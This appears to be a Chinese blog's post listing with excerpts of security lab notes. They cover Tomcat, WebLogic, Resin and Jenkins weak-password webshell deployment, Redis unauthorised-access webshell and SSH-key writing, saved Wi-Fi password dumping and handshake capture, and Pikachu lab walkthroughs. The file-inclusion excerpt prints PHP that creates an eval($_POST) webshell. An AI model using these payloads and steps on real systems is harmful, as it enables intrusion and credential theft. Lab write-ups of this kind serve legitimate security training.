- 博客(125)
- 资源 (9)
- 收藏
- 关注
原创 0803实操-数字取证
输入命令netstat-a>netstat.txt获取所有网络连接和侦听端口信息,并保存在netstat.txt文档中。输入命令date/t>timefront.txt和命令time/t>>timefront.txt将获取的日期和时间存储在timefront.txt文档中。使用命令date/t>timeback.txt和命令time/t>>timeback.txt获取的日期和时间存储在timeback.txt文档中。netstat-a>netstat.txt获取所有网络连接和侦听端口信息。
2024-08-03 16:53:29 294
原创 0803实操-Windows Server系统管理
查找其他网络设备和计算机:当网络发现功能启用时,您的计算机能够扫描网络并识别出其他计算机、打印机、共享文件夹等设备和资源。这使得共享文件和打印机变得更加容易和直观。提升共享便利性:对于家庭或小型办公网络而言,启用网络发现可以显著提高资源共享的便利性。Windows启用网络发现是指在网络设置中启用一个功能,该功能允许您的计算机在网络上识别和访问其他设备和计算机。被其他设备访问:同样地,当网络发现功能启用时,其他计算机和设备也可以在网络上找到您的计算机,并尝试访问您共享的资源,如文件、打印机等。
2024-07-06 10:41:04 245
原创 日志分析-windows系统日志分析
Windows7和Windowserver2008R2的主机日志保存在C:\Windows\System32\winevt\Logs文件夹下,Security.evtx即为Windows安全节点下安全日志,双击即可使用事件查看器打开并进行查看。使用LogParser分析Windows日志。使用事件查看器分析Windows系统日志。清除日志、注销并重新登陆,查看日志情况。cmd命令 eventvwr。将安全日志导出为csv文件。
2024-06-29 18:27:09 236
原创 Linux操作系统及应用
文件路径常用命令mkdir、rmdir创建删除目录cp、mv复制、剪切cat、nl、head、tail 文件内容查看。
2024-06-23 00:44:50 1044
原创 web中间件漏洞-Jenkins漏洞-弱口令、反弹shell
默认用户一般为jenkins/jenkins使用admin/admin123登陆成功。
2024-06-22 22:24:24 560
原创 web中间件漏洞-Redis漏洞未授权访问漏洞-写webshell、写ssh公钥
利用redis未授权访问、攻击机向服务器写入webshell从服务器查看写入的webshell菜刀连接。
2024-06-22 21:21:09 418
原创 web中间件漏洞-Resin漏洞-密码爆破、上传war
想部署webshell,得使用SSL方式请求,访问https://192.168.1.2:8443/resin-admin/index.php?q=deploy&s=0(注:如果使用最新的火狐浏览器或者谷歌浏览器访问时可能会出现证书错误阻止访问,建议使用IE浏览器或者降低浏览器版本进行访问)。上传webshell,部署war文件,浏览选择C:\工具\resin\ma.war,点击Deploy。部署完成,访问即可xxx.xxx.xxx.xxx/ma/ma.jsp。
2024-06-20 22:49:58 371
原创 web中间件漏洞-weblogic漏洞-弱口令war包上传
jar cvf ma.war.(最后的.代表打包当前目录)弱口令weblogic/weblogic123。点击部署后、一直点击下一步。访问webshell。
2024-06-20 21:25:26 159
原创 web中间件漏洞-Tomcat漏洞-密码爆破、war包上传
抓登陆包、对字典进行base64编码,爆破得到账号密码tomcat/tomcat,登陆即可tomcat/tomcat登陆成功。
2024-06-20 15:55:56 286
原创 查看连接过的wifi历史记录及密码
查看连接过的历史wifi及密码netsh wlan show profile 查看wifi历史记录netsh wlan show profile name=“北固湾” key=clear 查询某个wifi的密码netsh wlan export profile folder=C:\Users\Administrator\Desktop\wifi key=clear 批量导出wifi配置文件查看密码
2023-11-17 09:52:52 603
原创 QT5 WebCapture 页面定时截图工具
1.设置启动时间,程序会到启动时间后开始对网页依次进行截图2.根据所需截图的页面加载速度,设置页面等待时间,尽量达到等页面加载完成后,再执行截图3.根据需求,设置截图周期4.程序会使用默认浏览器打开页面进行截图,每轮截图完成后,便会根据默认浏览器进程名称关闭浏览器(防止留存大量页面导致系统卡顿)
2023-10-08 15:59:32 837
原创 windows应急整理
用工具直接在注册表里创建隐藏账号 就在compmgmt.msc 里面删除隐藏账号也没用 那个隐藏账号依旧存在。tasklist /svc | find “PID” 查找PID 对应的程序。taskkill /pid PID值 /T /F 结束进程以及创建的子进程。taskkill /pid PID值 /T 结束进程以及创建的子进程。%temp%查看 temp 目录下是否有异常文件。而且任务计划程序设置的不会在at 命令中显示。而at 设置的计划 会在任务计划程序里显示。任务计划程序 里面也是显示计划任务。
2023-06-19 16:06:48 1436
原创 C++ 模拟按下键盘的某个按键
keybd_event是Windows API中的一个函数,用于模拟键盘按键事件。因此,keybd_event(VK_DOWN, 0, 0, 0)的意思是模拟按下向下箭头键。需要注意的是,这段代码只在Windows平台上有效,且需要包含Windows.h头文件。第一个参数指定要模拟的键码,例如VK_DOWN表示向下箭头键。第三个参数指定按键事件的类型,0表示按下键,1表示释放键。第四个参数指定一个附加的32位值,通常也设置为0即可。第二个参数指定扩展键和状态标志位,通常设置为0即可。
2023-04-27 15:31:50 2838
原创 考研英语知识点
2.现在进行时 (Present Continuous Tense)4.过去进行时 (Past Continuous Tense)5.现在完成时 (Present Perfect Tense)1.一般现在时 (Simple Present Tense)9.将来完成时 (Future Perfect Tense)6.过去完成时 (Past Perfect Tense)3.一般过去时 (Simple Past Tense)7.将来时 (Future Tense)
2023-04-12 15:29:38 850
原创 无线安全检查方法
ifconfig ,发现wlan0变成wlan0man了(wlan0mon 为wlan0网卡开启的监听模式,wlan0mon就可以嗅探网络了)airodump-ng wlan0mon 进行wifi扫描,看看有哪些wifi。把这里的USB兼容性都点一遍,它会自动安装好,这样才可以识别到无线网卡。这个红框里显示的是连接到L440这个wifi的客户端(手机 ipad等)获取到握手包会在蓝色框显示,一直获取不到就用步骤6切断用户连接。虚拟机桥接或者NAT到物理机都可以,无所谓。
2023-03-15 17:54:39 1199
原创 pikachu之SSRF
pikachu之SSRF概述SSRF(curl)看一下源代码,服务器会去请求传入的url,并把请求到的内容结果,输出到前端由于curl可以执行的不止是http协议,还有ftp,telnet等,这样就可以通过传入恶意的url参数,使用服务器的身份进行恶意操作...
2021-12-23 14:39:58 2714
原创 pikachu之URL重定向
pikachu之URL重定向点击不同的a标签,会跳转到不同的页面看一下源代码http://127.0.0.1/pikachu-master/vul/urlredirect/urlredirect.php?url=http://www.baidu.com将链接发送给别人,如果url=http://www.baidu.com是钓鱼网网站,那么点击的人就会中招,跳转到钓鱼网站...
2021-12-23 10:48:20 2024
原创 pikachu之Over permission
pikachu之Over permission水平越权登陆lucy的账号,在查看个人信息时,将username修改为lili,可以平行越权查看lili的个人信息垂直越权登陆管理员用户账号,抓取删除某用户的请求包退出登录,登陆普通用户的账号,并将上面删除用户的数据包,替换为普通用户的cookie,重放数据包,发现成功删除了用户名为2的用户...
2021-12-22 15:35:56 251
原创 pikachu之Unsafe Fileupload
pikachu之Unsafe Fileupload感觉有些混乱,但是就是总结为 改后缀,改image/png,图片马。。。。client check前端校验抓包改名绕过MIME type合成图片马filename改为php后缀getimagesize啥都验证了.就上传图片马,然后使用文件包含进行利用...
2021-12-22 15:07:19 2280
原创 pikachu之 File Inclusion
pikachu之 File Inclusion准备好一段创建一句话木马的php代码,后缀改为jpg<?php$mima="'".'ma'."'";touch ("testshell.php");$file = fopen("testshell.php","w");$write='<?php @eval($_POST['.$mima.']); ?>';echo fwrite($file,$write);fclose($file);echo "已经创建一句话php文件";
2021-12-10 16:25:49 1765
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人